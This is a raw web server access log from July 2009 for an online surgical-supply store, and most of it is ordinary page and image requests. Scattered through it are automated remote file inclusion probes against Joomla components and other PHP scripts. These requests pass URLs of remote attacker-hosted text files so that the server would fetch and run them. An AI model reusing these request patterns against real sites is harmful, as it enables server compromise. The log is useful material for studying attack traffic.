69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:04 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45922 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:04 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45922 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
70.86.9.234 - - [01/Jul/2009:07:42:18 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:07:43:14 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:43:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:43:14 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [01/Jul/2009:07:43:25 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [01/Jul/2009:07:43:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [01/Jul/2009:07:43:25 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.152.208.66 - - [01/Jul/2009:07:43:30 -0400] "GET /logs/error_log.Q109062300%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
216.254.103.223 - - [01/Jul/2009:07:44:09 -0400] "GET /logs/access_log.Q109052800%20%20//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:11 -0400] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:11 -0400] "GET /logs/access_log.Q109062200//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:11 -0400] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:17 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:17 -0400] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:17 -0400] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:17 -0400] "GET /logs/access_log.Q109062300//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:07:44:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:44:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:44:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.152.208.66 - - [01/Jul/2009:07:44:41 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:41 -0400] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:44:41 -0400] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:07:44:58 -0400] "GET /main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:07:44:58 -0400] "GET /logs/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:07:44:58 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:45:04 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:45:06 -0400] "GET /logs/access_log.Q109062300//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
64.40.150.211 - - [01/Jul/2009:07:45:35 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.zorgno.it/genealogy/LICENSE.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
172.16.1.180 - - [01/Jul/2009:07:45:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:45:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:45:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
196.25.27.90 - - [01/Jul/2009:07:45:52 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
196.25.27.90 - - [01/Jul/2009:07:45:52 -0400] "GET //include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
196.25.27.90 - - [01/Jul/2009:07:45:52 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
196.25.27.90 - - [01/Jul/2009:07:46:36 -0400] "GET //include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
196.25.27.90 - - [01/Jul/2009:07:46:36 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
196.25.27.90 - - [01/Jul/2009:07:46:36 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:46:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.231.126.252 - - [01/Jul/2009:07:47:00 -0400] "GET /main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:07:47:00 -0400] "GET /logs/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:07:47:00 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:07:47:01 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:47:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:07:47:01 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.152.208.66 - - [01/Jul/2009:07:48:06 -0400] "GET /logs/error_log.Q109062300//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:48:20 -0400] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
24.172.216.186 - - [01/Jul/2009:07:48:37 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76246 "http://www.acesurgical.com/home_workshop.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:38 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:38 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:38 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:38 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:38 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:38 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:40 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:41 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:48 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG HTTP/1.1" 200 37530 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:49 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:50 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
24.172.216.186 - - [01/Jul/2009:07:48:51 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129EE4765036200BEB0075+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
